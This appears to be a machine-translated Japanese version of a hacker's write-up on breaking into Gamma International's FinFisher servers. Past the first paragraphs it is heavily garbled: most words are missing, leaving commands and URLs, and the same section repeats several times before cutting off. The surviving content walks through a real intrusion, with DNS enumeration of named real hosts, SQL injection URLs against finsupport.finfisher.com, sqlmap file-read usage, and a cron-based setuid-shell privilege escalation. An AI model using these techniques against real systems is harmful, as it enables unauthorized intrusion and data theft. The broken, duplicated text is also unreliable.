8月3日、
subreddit / r / Anarchismで、 PhineasFisherのユーザーは、
Gamma Internationalから40ギガバイトのさまざまなデータを盗むことができると報告した
スレッドを作成しました。 おそらく、このヨーロッパの会社が従事しているビジネスのためでなければ、そのような話はそれほど注目されていなかったかもしれません。 最初のメッセージの数日後、クラッカーは、彼がどのようにして
ガンマインターナショナルサーバーに侵入し、そこで見つけたものかについての
長い話を投稿しました。
FinFisherの詳細
冒頭、小さな余談と、ハッカーが
ガンマインターナショナルに興味を持っていることについての話。 特に、この会社は
FinFisherソフトウェア
スイートを配布してい
ます 。これは、「
政府機関が使用するために作成された侵入およびリモート監視用のソフトウェアソリューション 」と呼ば
れています 。 主に中東のいくつかの州は、このスパイシステムの交渉または使用で有罪判決を受けましたが、これらの事実は広く公表され調査されていませんでした。
当初、マルウェアはiTunesの穴を介してコンピューターに到達しました(サードパーティのプログラムはすべて、利用可能なすべての操作とその後の結果でこのメディアセンターの自動更新を使用できます)。Appleは3年以上閉じていません。
2012年、バーレーンの野党活動家の多くは、添付ファイル付きのメールを受け取りました。写真やその他の文書を含む.rarアーカイブ。多機能のトロイの木馬が車に侵入しました。 ファイルの名前、たとえば
exe.Image.jpgは一見「正しい」ように見えますが、アラブ諸国向けにローカライズされたシステムでは、右から左に
gpj.egamI.exeことになっており、システムのファイルはイメージではなく実行可能ファイル
gpj.egamI.exeあることが判明し
gpj.egamI.exe CitizenLabのメンバーはこの攻撃の調査を引き受けました。
フォルダーにコピーされたトロイの木馬
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
